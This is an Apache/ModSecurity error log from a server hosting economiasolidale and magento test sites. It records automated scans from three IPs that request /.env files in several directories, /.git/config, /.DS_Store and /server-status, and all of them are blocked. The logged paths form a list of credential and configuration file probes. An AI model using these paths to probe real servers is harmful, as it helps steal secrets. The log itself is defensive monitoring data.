[Fri Nov 28 04:52:37.530399 2025] [authz_core:error] [pid 376626] [client 139.59.143.102:33678] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 28 04:52:38.568584 2025] [:error] [pid 376663] [client 139.59.143.102:33716] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSkchpH0GUhT44RtNq2lvQAAAAY"]
[Fri Nov 28 04:52:38.568825 2025] [:error] [pid 376663] [client 139.59.143.102:33716] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSkchpH0GUhT44RtNq2lvQAAAAY"]
[Fri Nov 28 04:52:38.569019 2025] [:error] [pid 376663] [client 139.59.143.102:33716] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSkchpH0GUhT44RtNq2lvQAAAAY"]
[Fri Nov 28 04:52:39.265952 2025] [:error] [pid 376637] [client 139.59.143.102:33720] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSkch1A4g9EMayny11QizQAAABI"]
[Fri Nov 28 04:52:39.266239 2025] [:error] [pid 376637] [client 139.59.143.102:33720] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSkch1A4g9EMayny11QizQAAABI"]
[Fri Nov 28 04:52:39.266455 2025] [:error] [pid 376637] [client 139.59.143.102:33720] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSkch1A4g9EMayny11QizQAAABI"]
[Fri Nov 28 04:52:39.638820 2025] [:error] [pid 376664] [client 139.59.143.102:33726] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSkchzdoVH3rSFLp8WVibgAAAAg"]
[Fri Nov 28 04:52:39.639078 2025] [:error] [pid 376664] [client 139.59.143.102:33726] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSkchzdoVH3rSFLp8WVibgAAAAg"]
[Fri Nov 28 04:52:39.639254 2025] [:error] [pid 376664] [client 139.59.143.102:33726] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSkchzdoVH3rSFLp8WVibgAAAAg"]
[Fri Nov 28 06:59:49.770108 2025] [authz_core:error] [pid 376647] [client 157.245.113.227:43632] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 28 06:59:50.648837 2025] [:error] [pid 376631] [client 157.245.113.227:43650] [client 157.245.113.227] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSk6VpjihkEKa1eLtZQNLAAAAAw"]
[Fri Nov 28 06:59:50.649096 2025] [:error] [pid 376631] [client 157.245.113.227:43650] [client 157.245.113.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSk6VpjihkEKa1eLtZQNLAAAAAw"]
[Fri Nov 28 06:59:50.649263 2025] [:error] [pid 376631] [client 157.245.113.227:43650] [client 157.245.113.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSk6VpjihkEKa1eLtZQNLAAAAAw"]
[Fri Nov 28 06:59:50.936696 2025] [:error] [pid 376637] [client 157.245.113.227:43658] [client 157.245.113.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSk6VlA4g9EMayny11QjRgAAABI"]
[Fri Nov 28 06:59:50.936936 2025] [:error] [pid 376637] [client 157.245.113.227:43658] [client 157.245.113.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSk6VlA4g9EMayny11QjRgAAABI"]
[Fri Nov 28 06:59:50.937102 2025] [:error] [pid 376637] [client 157.245.113.227:43658] [client 157.245.113.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSk6VlA4g9EMayny11QjRgAAABI"]
[Fri Nov 28 06:59:51.228149 2025] [:error] [pid 376626] [client 157.245.113.227:43674] [client 157.245.113.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSk6VxY37ftiQrkmT0VbHwAAAAc"]
[Fri Nov 28 06:59:51.228433 2025] [:error] [pid 376626] [client 157.245.113.227:43674] [client 157.245.113.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSk6VxY37ftiQrkmT0VbHwAAAAc"]
[Fri Nov 28 06:59:51.229066 2025] [:error] [pid 376626] [client 157.245.113.227:43674] [client 157.245.113.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSk6VxY37ftiQrkmT0VbHwAAAAc"]
[Fri Nov 28 10:26:21.972093 2025] [authz_core:error] [pid 381103] [client 54.67.124.117:53424] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Fri Nov 28 10:26:22.192260 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSlqvuhaa_ABFroPvQ_chwAAABY"]
[Fri Nov 28 10:26:22.192505 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSlqvuhaa_ABFroPvQ_chwAAABY"]
[Fri Nov 28 10:26:22.192696 2025] [:error] [pid 381109] [client 54.67.124.117:53466] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSlqvuhaa_ABFroPvQ_chwAAABY"]
[Fri Nov 28 10:26:22.359451 2025] [:error] [pid 376661] [client 54.67.124.117:53422] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSlqvvjJXEGeKpnW72TIggAAAAM"]
[Fri Nov 28 10:26:22.359972 2025] [:error] [pid 376661] [client 54.67.124.117:53422] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSlqvvjJXEGeKpnW72TIggAAAAM"]
[Fri Nov 28 10:26:22.360152 2025] [:error] [pid 376661] [client 54.67.124.117:53422] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSlqvvjJXEGeKpnW72TIggAAAAM"]
[Fri Nov 28 10:26:22.364554 2025] [:error] [pid 376626] [client 54.67.124.117:53420] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSlqvhY37ftiQrkmT0VbNQAAAAc"]
[Fri Nov 28 10:26:22.364784 2025] [:error] [pid 376626] [client 54.67.124.117:53420] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSlqvhY37ftiQrkmT0VbNQAAAAc"]
[Fri Nov 28 10:26:22.364944 2025] [:error] [pid 376626] [client 54.67.124.117:53420] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSlqvhY37ftiQrkmT0VbNQAAAAc"]
[Fri Nov 28 10:26:22.618091 2025] [:error] [pid 381096] [client 54.67.124.117:53464] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSlqvkwzgzL7eJjqEC3-NQAAAAE"]
[Fri Nov 28 10:26:22.618318 2025] [:error] [pid 381096] [client 54.67.124.117:53464] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSlqvkwzgzL7eJjqEC3-NQAAAAE"]
[Fri Nov 28 10:26:22.618542 2025] [:error] [pid 381096] [client 54.67.124.117:53464] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSlqvkwzgzL7eJjqEC3-NQAAAAE"]
[Fri Nov 28 10:26:22.692835 2025] [:error] [pid 376666] [client 54.67.124.117:53558] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSlqvuC2mMOyxS8_IwAJkAAAABU"]
[Fri Nov 28 10:26:22.693203 2025] [:error] [pid 376666] [client 54.67.124.117:53558] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSlqvuC2mMOyxS8_IwAJkAAAABU"]
[Fri Nov 28 10:26:22.693418 2025] [:error] [pid 376666] [client 54.67.124.117:53558] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSlqvuC2mMOyxS8_IwAJkAAAABU"]
[Fri Nov 28 10:26:22.696972 2025] [:error] [pid 381101] [client 54.67.124.117:53462] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSlqvlqQQHDRbSQ0A6GjeAAAAAw"]
[Fri Nov 28 10:26:22.697269 2025] [:error] [pid 381101] [client 54.67.124.117:53462] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSlqvlqQQHDRbSQ0A6GjeAAAAAw"]
[Fri Nov 28 10:26:22.697472 2025] [:error] [pid 381101] [client 54.67.124.117:53462] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSlqvlqQQHDRbSQ0A6GjeAAAAAw"]
[Fri Nov 28 10:26:22.909901 2025] [authz_core:error] [pid 376662] [client 54.67.124.117:53560] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Fri Nov 28 10:26:24.333204 2025] [:error] [pid 381098] [client 54.67.124.117:53698] [client 54.67.124.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSlqwI82H0veIIugqWKNpAAAAAk"]
[Fri Nov 28 10:26:24.333435 2025] [:error] [pid 381098] [client 54.67.124.117:53698] [client 54.67.124.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSlqwI82H0veIIugqWKNpAAAAAk"]
[Fri Nov 28 10:26:24.333618 2025] [:error] [pid 381098] [client 54.67.124.117:53698] [client 54.67.124.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSlqwI82H0veIIugqWKNpAAAAAk"]
